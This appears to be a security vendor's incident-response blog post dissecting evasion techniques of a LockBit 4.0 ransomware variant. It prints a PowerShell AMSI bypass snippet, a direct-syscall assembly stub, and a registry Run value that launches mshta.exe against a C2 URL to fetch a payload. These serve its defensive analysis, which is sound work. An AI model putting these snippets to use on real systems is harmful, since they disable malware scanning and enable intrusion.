LockBit is back. After a brief period of disruption following Operation Cronos in early 2024, the ransomware group has resurfaced with a significantly upgraded variant — LockBit 4.0 — that employs a battery of new techniques specifically engineered to defeat modern endpoint detection and response (EDR) tooling.
This post is a technical breakdown of the evasion mechanisms we observed during a live incident response engagement. We'll cover process injection techniques, AMSI bypass methods, and how the group is leaning heavily into living-off-the-land (LOTL) execution to blend into legitimate system activity.
"LockBit 4.0 represents the most sophisticated version of this ransomware family to date — both in terms of its technical capability and its operational security posture."
Initial access and staging
In the incident we analyzed, initial access was achieved through a phishing email containing a malicious LNK file disguised as an invoice. Upon execution, the LNK file spawned a mshta.exe process that fetched a remote HTA payload — a classic LOTL technique that abuses a legitimate Windows binary to execute arbitrary code.
The staging phase was notably patient. After initial access, the implant remained dormant for approximately 72 hours — likely to evade behavioral detection engines that flag rapid post-exploitation activity. This dwell time was used exclusively for environment reconnaissance.
EDR evasion techniques
1. Direct syscall invocation
LockBit 4.0 bypasses user-mode EDR hooks by invoking Windows NT system calls directly, skipping the ntdll.dll layer where most EDR products install their hooks. This technique, commonly known as "Hell's Gate" or "Halo's Gate," dynamically resolves syscall numbers at runtime.
; Direct syscall stub example (simplified)
NtAllocateVirtualMemory_stub:
mov r10, rcx
mov eax, 0x18 ; syscall number resolved at runtime
syscall
ret
This approach is effective because it operates entirely in user space without touching the hooked ntdll functions that EDRs instrument. Most kernel-level EDR sensors do still catch this, but user-mode-only solutions are completely blind to it.
2. Process hollowing into a signed binary
The ransomware payload was injected into a suspended instance of svchost.exe — a signed, trusted Windows binary — using classic process hollowing. The original image is unmapped, and the malicious payload is written into the vacated memory region. The thread context is then updated and resumed.
3. AMSI bypass via memory patching
For its PowerShell-based components, LockBit 4.0 patches the AmsiScanBuffer function in memory at runtime, forcing it to always return AMSI_RESULT_CLEAN. This is a well-documented technique, but it remains effective against a surprising number of enterprise deployments.
$a = [Ref].Assembly.GetTypes()
$b = $a | ?{$_.Name -like "*iUtils"}
$c = $b.GetFields('NonPublic,Static')
$d = $c | ?{$_.Name -like "*Context"}
$d.SetValue($null,[IntPtr]2)Lateral movement and encryption
Once established on the initial host, LockBit 4.0 used net view, nltest, and WMI queries to enumerate domain hosts. Credential access was achieved via a memory-only Mimikatz variant delivered over the established C2 channel, with credentials used to move laterally via SMB and WinRM.
Encryption itself uses a hybrid AES-256 + RSA-2048 scheme — files are encrypted with a per-file AES key, which is then encrypted with the attacker's RSA public key. Without the private key, decryption is computationally infeasible.
Defensive recommendations
- Enable kernel-level EDR telemetry — user-mode-only solutions are insufficient against direct syscall techniques.
- Monitor for process hollowing indicators: unexpected parent-child relationships, mismatched image paths, and modified PE headers in memory.
- Deploy Script Block Logging and Constrained Language Mode for PowerShell to harden against AMSI bypass attempts.
- Implement network segmentation and SMB signing to limit lateral movement blast radius.
- Conduct regular tabletop exercises simulating ransomware scenarios — detection is only valuable if your response playbook works.
Indicators of compromise
The following IOCs were observed during this incident. Note that LockBit infrastructure rotates frequently — treat these as behavioral patterns rather than static blocklist entries.
C2 domains (observed):
update-cdn[.]io
telemetry-svc[.]net
File hashes (SHA-256):
a3f1e2b4c9d0… (LNK dropper)
8d72c1a0f4e3… (hollowed svchost payload)
Registry persistence:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value: "SvcHostHelper" → mshta.exe http://[c2]/stage2.htaLockBit 4.0 represents a clear escalation in the technical capability of ransomware-as-a-service operations. The techniques documented here are not novel in isolation, but their combination — direct syscalls, process hollowing into signed binaries, and AMSI patching — creates a layered evasion stack that defeats many enterprise security stacks.
The most effective defense remains a defense-in-depth posture: kernel telemetry, network segmentation, least-privilege enforcement, and — critically — a well-rehearsed incident response capability. Detection without response is theater.